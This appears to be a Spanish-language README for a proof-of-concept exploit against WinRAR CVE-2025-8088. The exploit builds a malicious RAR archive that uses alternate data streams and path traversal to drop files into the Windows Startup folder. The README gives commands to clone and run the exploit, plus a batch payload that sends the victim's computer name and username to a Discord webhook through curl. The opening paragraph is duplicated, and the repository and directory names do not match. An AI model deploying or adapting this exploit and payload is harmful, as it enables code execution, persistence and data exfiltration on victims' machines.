
Un exploit de prueba de concepto para la vulnerabilidad de WinRAR (CVE-2025-8088) que afecta a las versiones 7.12 y anteriores. Esta herramienta crea un archivo RAR malicioso que incrusta cargas útiles en flujos de datos alternativos (ADS) con path traversal, lo que podría llevar a la ejecución de código arbitrario.
Un exploit de prueba de concepto para la vulnerabilidad de WinRAR (CVE-2025-8088) que afecta a las versiones 7.12 y anteriores. Esta herramienta crea un archivo RAR malicioso que incrusta cargas útiles en flujos de datos alternativos (ADS) con path traversal, lo que potencialmente lleva a la ejecución de código arbitrario.
# Clonar el repositorio
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088
# Instalar dependencias
pip install reportlab
# Ejecutar el exploit
python CVE-2025-8088.py
Edita la carga útil para llamar a un webhook de Discord:
# Reemplaza la variable PAYLOAD en el script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extraído en %COMPUTERNAME% por %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
Reemplaza YOUR_DISCORD_WEBHOOK_URL con la URL real de tu webhook.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\